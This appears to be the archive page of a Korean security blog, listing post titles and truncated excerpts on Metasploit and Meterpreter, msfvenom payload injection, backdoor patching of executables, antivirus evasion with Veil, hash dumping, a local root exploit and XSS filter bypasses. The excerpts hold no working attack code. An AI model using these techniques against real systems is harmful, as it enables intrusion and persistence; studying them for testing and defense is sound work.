최근 SSL 관련하여 취약점에 대한 이야기가 하나 더 있었는데, 11/5일 기준으로 EDB에 해당 코드가 올라와 보고 분석할 겸 하여 작성하였습니다. 사실 이 취약점은 올 여름(6월 즈음) 발견되어 OpenSSL에 보고된 후 조치까지 이루어진 취약점입니다. 그러나 SSL 관련 업그레이드를 하지 않은 서버, 클라이언트에는 ...

[EXPLOIT] 삼성(Samsung) SecEmailUI.apk 취약점(Vulnerability SecEmailUI.apk on Android) #edb-38554 / CVE-2015-7893

EDB를 보던 중 Samsung 관련 취약점이 있어 보게 되었는데, 굉장히 심플한 Android Exploit 이 있었습니다. Google Security Team에서 올린 것 같고, 10/28일자로 EDB에 업데이트 되었네요. EDB-ID: 38554 CVE: 2015-7893 OSVDB-ID: N/A Author...

[METASPLOIT] Android Meterpreter Shell 분석 - Part 1 Meterpreter APK Analysis

Metasploit 에서 제공하는 Meterpreter Shell. 그 중 Android Apk를 통한 Shell에 대한 분석을 해볼까 합니다. MSF와 Meterpreter에 관심이 많아 이전에도 따로 보안가 입장에서 분석해볼까 하였는데, 안드로이드 Shell을 사용해야 할 상황이 생겨 분석을 해볼까합니다. 실제 돌아가는...

[METASPLOIT] Metasploit Custom Scanner 만들기(Make Simple Scan Module)

offensive-security 에서 뭐 볼게 있다 뒤적뒤적하던 중 Metasploit Unleashed 에서 간단한 Scan Moudle 코드를 보았습니다. 물론 msf 자체가 ruby로 구성되어 있어 ruby를 쓰시는 분들은 쉽게 제작할 수 있지만, 일단 샘플코드가 있다면 다른 코드로 확장하기 굉장히 유용하기 때문에 따...

[METASPLOIT] Metasploit에서 generate 명령을 통해 payload 생성하기(generate shellcode on metasploit)

msf에서는 공격에 사용되는 shell을 code 형태로 나타낼 수 있는 기능이 있습니다. 바로 generate 명령입니다. 이 명령을 통해 shellcode를 육안으로 보고 복사하여 사용할 수 있게 하는 좋은 기능입니다. payload 지정 후 generate 명령으로 shellcode 출력 hahwul #>...

ActiveX 취약점 분석 방법(ActiveX Vulnerability Analysis)

ActiveX MS사(Microsoft)에서 만든 COM(컴포넌트 오브젝트 모델)과 OLE(오브젝트 링킹 앤 임베딩)기술두개를 합쳐서 새로 이름 지은 것이 바로 ActiveX입니다. 주로 IE에서 애드온인 ActiveX Control으로 사용됩니다. 유독 우리나라에선 많이 사용되었지만, 보안적인 문제로 인하여 점차 사라지고...

[HACKING] BDF(BackDoor-Factory) 설치 및 exe 파일에 backdoor 패치하기(patch executable binaries with user desired shellcode)

공격 성공 후 가장 먼지 설치하는 도구는 무엇이 있을까요? 아마 Dropper를 이용한 Backdoor 설치가 먼저라는 생각이 좀 드네요. Backdoor는 아주 오래전부터 사용된 기법이며, 공격자가 쉽게 드나들 수 있도록 길을 만드는 프로그램, 툴, 과정입니다. Wiki에서도 보시면 A backdoor in a com...

[METASPLOIT] Veil Framework(Payload Generator)를 이용한 Antivirus 우회하기

Payload Generator 를 찾던 중 재미있는 툴을 발견하였습니다. 바로 Veil이라는 툴인데요, MSF에서 사용하는 Meterpreter Shell에 대해 Antivirus를 우회하기 위해 인코딩할 수 있는 툴입니다. 로고도 양과 늑대의 그림자이네요. (뭔가 양의 탈을 쓴 늑대랄까요) Veil 은 http...

[Exploit] SSLv3 POODLE Attack 확인 및 대응방안(Check and Modify)

이전에 SSL3 Version 사용 시 보안적인 이슈가 있었던 POODLE Attack에 관한 이야기입니다. 나온지도 좀 되었고, 이미 브라우저 개발사 및 서버 측에서 SSLv3 를 사용하지 않는 식으로 하여서 영향력은 많이 떨어졌지만 그래도 간단하게 정리해놓는게 좋을 것 같아 작성합니다. [CVE-2014-3566]...

[EXPLOIT] StageFright Exploit Code 분석(StageFrigt Exploit Analysis)

StageFright Vulnerability 최근 안드로이드쪽에서 핫 이슈였던 StageFright 취약점에 대해 기억하시나요? 멀티미디어를 로드하는 스테이지프라이트 구간에 취약점으로 인해 미디어를 전송하는 MMS로 사용자의 핸드폰을 감염시킬 수 있는 취약점이였습니다. MMS 이외에도 미디어를 로드하는 구간에서 다수 발생할...

/proc/self/maps 파일을 이용하여 실행중인 시스템 메모리 주소 확인하기

모바일 악성코드 분석 중 /proc/ 하단 데이터를 건드리는 코드가 있어 추가로 내용 더 써서 작성하였습니다. 참고로 /proc 디렉토리는 리눅스에서 사용되는 디렉토리이고 시스템의 프로세스 정보를 담고 있습니다. 간단하게 구조를 살펴보자면 아래와 같습니다. /proc 프로세스 정보 /proc/[pid]/ : 구동중...

[HACKING] Android UnPacker - APK 난독화 풀기(APK Deobfuscation)

예전에 Defcon22 에서 발표된 Android Unpacker입니다. Install Android Unpacker Git을 통해서 쉽게 설치가 가능합니다. git clone https://github.com/strazzere/android-unpacker.git strazzere가 배포하는 Android Unpacke...

[SYSTEM HACKING] RIPS - Source Code Vulnerability Scanner(소스코드 취약점 분석 툴)

오늘은 Source Code 취약점 스캐너인 RIPS에 대한 이야기를 해볼까 합니다. RIPS는 PHP Security(www.php-security.org)에서 개발된 whitebox 기반 소스코드 취약점 분석 툴이며, sourceforge를 통해 배포되고 있습니다. php 기반으로 구성되어 있으며, 별도의 db 및 설정...

[HACKING] TOR를 이용하여 익명 네트워크 사용하기(Anonymity Network Using Tor) on linux

아래 양파로고가 메인인 tor에 대해 들어보셨나요? 익명브라우징에서는 굉장히 유명한 툴 입니다. 이전에도 tor 관련해서 글을 작성했던거 같은데요, 리눅스상에서 tor 설치 후 쉽게 사용하는 방법에 대해 작성해보았습니다. 짧으니 편하게 봐주시면 될 것 같습니다. tor는 쉽게 말해서 익명 네트워크를 제공해주는 도구입니...

Trinity를 활용한 System call Fuzzing

취약점을 찾기 위해 하는 작업 중 큰 부분을 차지하는것이 바로 Fuzzing 입니다. Fuzzing 을 돕는 프로그램을 Fuzzer라고 부르는데, Fuzzer 중 Linux 시스템에서 Syscall에 대한 Fuzzing 작업을 수행할 수 있는 “Trinity” 라는 툴에 대한 이야기를 할까 합니다. Trinity란? Tri...

[METASPLOIT] Metasploit 설치(bundle install) 시 발생 에러 처리(Install Metasploit troubleshooting)

Metasploit 설치 과정 중 발생할 수 있는 문제에 대한 해결방법입니다. 이번 글에서는 git 을 이용하여 clone 후 bundler 를 통한 ruby package 설치 과정 중 발생하는 에러에 대해서 처리하는 방법으로 작성하였습니다. 1. PG, pq 관련 에러 시 처리(PG or PQ Error) Error ...

[SYSTEM HACKING] 소프트웨어 버그를 이용한 시스템 취약점/해킹(System vulnerability&hacking use software bug)

오늘 테스트 프로그램으로 사용할 간단한 코드입니다. 사용자로부터 입력된 파일명을 tail 명령으로 조회하는 프로그램입니다. 대체로 system 함수 사용 시 sprintf로 명령행이 될 구간을 미리 작성하고 system 함수에 넣는 경우가 있는데, 사용자의 입력값에 대한 필터링 or 검증이 부족할 시 여러가지 공격방법에 취...

[HACKING] katoolin 을 이용한 Kali Linux Hacking tool 간편 설치(Easy Install Kali Linux Hacking Tool)

최근 Kali linux 2.0 이 릴리즈 되었습니다. 이에 맞춰서 kali 내부의 툴을 쉽게 설치할 수 있는 스크립트가 공유되고 있습니다. 저도 facebook group를 통해 정보를 얻었고, 확인해보니 간단하게 kali 저장소를 이용한 설치방법(apt)이지만 구조나, 주요 툴 리스트를 확인하며 설치가 가능하단 점에서 좋...

[HACKING] BeEF(The Browser Exploitation Framework) 설치하기(Install BeEF on Debian)

BeEF라는 툴을 들어보셨나요? 브라우저 후킹,XSS, Exploit 등 굉장히 유명한 툴 입니다. 이번에는 BeEF 툴 설치 과정을 다뤄볼까 합니다. 아주 간단합니다. BeEF 는 github를 통해 배포되고 있으며, clone 명령을 통해 쉽게 설치가 가능합니다. 아래와 같이 git clone 을 통해 beef 를...

[METASPLOIT] Metasploit의 AutoRunScript를 이용한 침투 후 자동 환경 구성

Metasploit 에선 AutoRunScript 라는 재미있는 기능을 지원합니다. 이 기능은 사용자가 미리 .rc 파일을 생성하여 동작할 모듈을 지정해놓고 Exploit 시 자동으로 등록한 동작을 수행하도록 할 수 있습니다. 이런 기능을 통해 공격자가 침투 후 수행해야할 부분에 대해 어느정도 시간 단축이 가능합니다. Me...

[METASPLOIT] Metasploit 을 이용한 HashDump 및 Password Crack(John the Ripper)

Metasploit 모듈 중 post/hashdump 와 john(john the ripper)를 통한 hash crack에 대한 이야기를 할까 합니다. 일단 meterpreter 쉘을 target pc 에 주입 및 구동하여 shell 연결을 유지합니다. meterpreter > ls Listing: C:\Docume...

[METASPLOIT] Metasploit 에서의 WMAP 모듈 로드 및 사용/스캔(Web Vulnerability Scan on MSF-WMAP)

Metasploit 은 침투(공겪)을 위한 프레임워크 중 가장 마음에 드는 프레임워크입니다. 이번에는 Metasploit 에서 로드 할 수 있는 기능 중 wmap 에 대해서 이야기를 풀어나가겠습니다. wmap 은 SQLMap에서 파생된 도구이며, 유사한 형태로 Web Application 에 대한 취약점 점검을 수행할 수 ...

[Android] aapt 를 이용하여 AndroidManifest.xml 및 퍼미션(perm) 확인하기(malware analysis)

안드로이드 APK 분석은 안드로이드 개발도구부터, 보안툴까지 여러가지 도구로 분석하게 됩니다. 이 중 aapt를 이용하여 퍼미션 정보만 확인하는법에 대해 간단히 작성합니다. aapt 는 android 패키징,언패키징,서명 등을 위해 주로 사용되는 도구이며 옵션을 활용하여 AndroidMenifest.xml 파일에 대해 확인...

[HACKING] WEBSPLOIT - MITM Attack Framework 설치 및 사용

Install WEBSPLOIT git clone https://github.com/websploit/websploit.git file list COPYING.GPL LICENCE README.txt core modules websploit wsf-update.py WEBSPLOIT 은 아래와 같은 기능을 수행...

[WEB HACKING] PHP Injection(code injection) 및 공격자 분석(Attack/Check Point/after Action)

이번에는 자주 발생하지는 않지만 강력한 위력을 가진 code injection(server-side injection)에 대한 이야기를 풀어나갈까 합니다. 대체로 php injection 으로 많이 알려져 있으며, 여러가지 웹 언어에서 동작이 가능한 공격방법입니다. Code Injection(PHP Injection)이란...

OpenVAS Debian Linux 에 설치하기(Install OpenVAS Scanner on debian)

최근 OpenVAS 설치 관련 글을 작성하였는데요, 문제가 있는 것 같아. 삭제 후 다시 작성하였습니다. 간단하게 스크립트로 한번에 설치가 가능합니다. echo “deb http://download.opensuse.org/repositories/security:/OpenVAS:/UNSTABLE:/v6/Debian_7....

[METASPLOIT] MSF에서 workspace를 이용한 효율적인 Target 관리(workspace management)

Metasploit을 이용해 Target 에 대해 테스트 진행 후 shell 이나 관련 타겟 정보를 db에 저장하곤 합니다. postgresql 을 이용하여 MSF와 연동하여 target host, port , vulnerability 등을 저장하는데 데이터가 많이 쌓이다 보면 어디가 어떤 사이트인지 혼동이 가기 시작할 겁니...

[METASPLOIT] MSF에서 Postgres DB 연결 및 사용하기

Setup DB(Postgres) DB 연결 전 postgres DB에서 사용할 계정 및 DB를 생성합니다. 먼저 postgres 계정으로 전환합니다. su - postgres 전환 후 createuser 명령으로 msf에서 db로 사용할 계정을 생성합니다. createuser htest_db -P Enter pass...

MSFVENOM을 이용한 Android 침투 및 Meterpreter Shell 사용

metasploit 은 공격을 위한 도구 중 정말 유용하고 Custom 하기에도 좋은 툴입니다. 대체로 linux, unix, windows 시스템에 대해 테스트를 하고 shell 을 삽입 했었는데, Android 에서 작동하는 Meterpreter shell 은 어떨까? 라는 생각이 들어 해보았습니다. 일단 간단하게 ms...

XSS(Cross Site Script)와 XFS(Cross Frame Script)의 차이

⚠️ XSS에 대한 전반적인 내용은 Cullinan > XSS 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D XFS는 사실상 어느정도 XSS에 속하는 취약점이지만 그래도 별도로 불려지고 있는 공격 방법입니다. 오늘은 XFS에 대한 이야기를 할까 합니다. XFS란? ...

HEX Encoding을 이용한 XSS 필터링 우회

⚠️ XSS에 대한 전반적인 내용은 Cullinan > XSS 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D 웹 취약점 분석 중 가장 많이 발견되는 XSS 취약점에 관한 이야기입니다. 대체로 쉽게 필터링 없이 들어가는 사례도 많았지만 분석했던 대다수의 서비스는 강한 ...

안드로이드 코드단에서 루팅 기기를 확인하는 방법들

다수의 모바일 악성코드는 사용자 디바이스의 루팅 여부를 확인하는 경우가 많습니다. 추가적인 root exploit 없이 쉽게 root 권한을 사용할 수 있으며, root 권한을 통해 안드로이드 OS에서 통제하지 못하는 부분에 대해서도 작업이 가능하기 때문입니다. su 명령 확인 루팅된 단말은 su(switch user) 명...

JAD(Java Decompiler)를 이용한 Android APK Decompile

악성 안드로이드 APK 분석 시 많이 사용되는 툴인 jad에 관한 이야기를 할까 합니다. jad 는 주로 dex2jar 를 통해 디컴파일하여 분석하는 과정 중 디컴파일이 불가능한 부분(ERROR 노출)을 java 코드로 변환하여 확인하기 위해 많이 사용하였습니다. Jad (Java Decompiler) is an as...

[CVE-2015-1328] overlayfs local root exploit

최근 케노니컬 사 홈페이지 및 Exploit-db 를 통해서 공유된 취약점입니다. CVE-2015-1328은 Ubuntu 12.04, 14.04, 14.10, 15.04 등 6/15일 이전 커널에서 동작하며 overlayfs 를 사용할 때 권한 상승이 가능한 취약점이며 해당 취약점을 통해 공격자가 쉽게 관리자 권한(root)...

Javascript 코드 난독화(Code Obfuscation)와 JS Packing

코드 난독화란 코드를 쉽게 알아볼 수 없도록 만드는 기술입니다. 쉽게 생각하면 int a = 123 이란 코드를 int a = ((123+34+350-34-350)*0)+123 같이 좀 더 알아보기 어렵게 만드는 기술입니다. 물론 위의 대충 쓴 코드는 쉽게 볼 수 있지만 escape, unescape 함수 등을 이용해서 코드...

Linux System hooking using LD_PRELOAD

공유 라이브러리의 경로를 의미하는 LD_PRELOAD를 이용하여 Linux System 후킹에 대한 이야기입니다. 크게 시나리오를 보자면 LD_PRELOAD에 공격자가 .so 파일을 삽입하고 시스템 명령이 해당 so 파일을 로드하여 명령 내에서 사용되는 함수를 바꿔치기 하여 데이터를 숨기는 과정입니다. LD_PRELOAD에...

MSFVENOM을 이용하여 Application에 Exploit Code 주입하기

MSFVENOM metasploit 에 포함된 기능 중 하나이며 간단한 명령으로 exploit 코드 생성, exploit이 포함된 프로그램 생성, 기존에 존재하는 프로그램에 주입하는 등 여러가지 행위가 가능합니다. msfpayload, msfencoder 로도 가능하지만 개인적으로는 venom 이 가장 편한 것 같습니다. ...

Android 디바이스에서 설치된 APK 파일 추출하기 (adb x pm)

adb shell 내 pm 명령을 이용하여 package 경로 확인이 가능합니다. 경로 확인 후 adb pull 을 이용하여 apk 파일을 꺼내올 수 있습니다. 설치된 package 경로 확인 전체 리스트 확인 adb shell pm list packages -f 특정 패키지만 찾기 adb shell pm list p...

HTTP.sys Remote Code Exploit(CVE-2015-1635/MS15-034) 취약점

최근 이슈가 됬었던 MS 보안패치 중 HTTP.sys Remote Code Exploit(CVE-2015-1635/MS15-034)에 대한 이야기가 있었습니다. 공격자가 HTTP 헤더를 조작하여 취약한 시스템에 이상을 발생시키는 취약점이며 윈도우 계열 서버인 IIS에서 가능하며, 어느정도 이슈가 있었던 것으로 보입니다. H...

SWF 디컴파일러 FFDEC (JPEX Free Flash Decompiler)

SWF 디컴파일러인 FFDEC 에 대한 설치 방법 및 간단한 사용 방법입니다. FFDEC는 SWF 파일에 대해 쉽게 분석 가능하도록 코드단에서 확인이 가능한 툴 입니다. 여기서 잠깐 위키 피디아의 SWF의 정의에 대해서 한번 보면 아래와 같습니다. SWF는 어도비 플래시에서 멀티미디어, 벡터 그래픽, 액션스크립트 (t...

HTML Event Handler를 이용한 XSS

⚠️ XSS에 대한 전반적인 내용은 Cullinan > XSS 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D XSS 테스트 시 많이 사용하는 방법인 이벤트 핸들러를 사용하는 방법입니다. 주로 < > 에 대한 필터링이 적용되어 있거나 싱글쿼터, 더블쿼터에 대...

NTFS File System 의 숨겨진 영역 ADS(Alternate Data Stream)

요즘 포렌식, 윈도우즈 시스템에 관심이 생겼습니다. 거의 리눅스만 사용하기 때문에 윈도우즈 시스템의 재미있는 부분에 대해서 많이 모르고 있었더군요. 그 중 오늘은 ADS(Alternate Data Stream) 영역에 관련된 이야기를 할까 합니다. ADS 컴퓨터에서 파일이나 자료를 보관하는 조직 체제를 파일시스템이라고 ...

iOS에서 usb 터널을 통한 SSH 연결 방법

IOS에서 작업을 할 때 터미널 어플리케이션 앱을 이용하는 것은 굉장히 불편합니다. 그래서 주로 SSH 연결을 통해 작업을 진행하는데, 네트워크를 사용할 수 없는 환경이나 속도에 이슈가 있는 경우 이 또한 작업하기에 조금 불편합니다. 이럴 때 usb 터널링을 통해 SSH 연결할 수 있는 방법이 있습니다. usb를 통해 데이...

Short XSS! 공격구문 삽입부분이 작을때 XSS를 삽입하는 방법들

⚠️ XSS에 대한 전반적인 내용은 Cullinan > XSS#short-xss 페이지에서 관리하고 있습니다. 해당 페이지에서 최신 데이터가 유지되니 참고 부탁드려요 :D XSS에 대한 테스트를 하다보면 특수문자나 구문에 대해 필터링이 이루어지지는 않지만 때때로 여러가지 난관에 막힙니다. 그 중 입력 글자 수 ...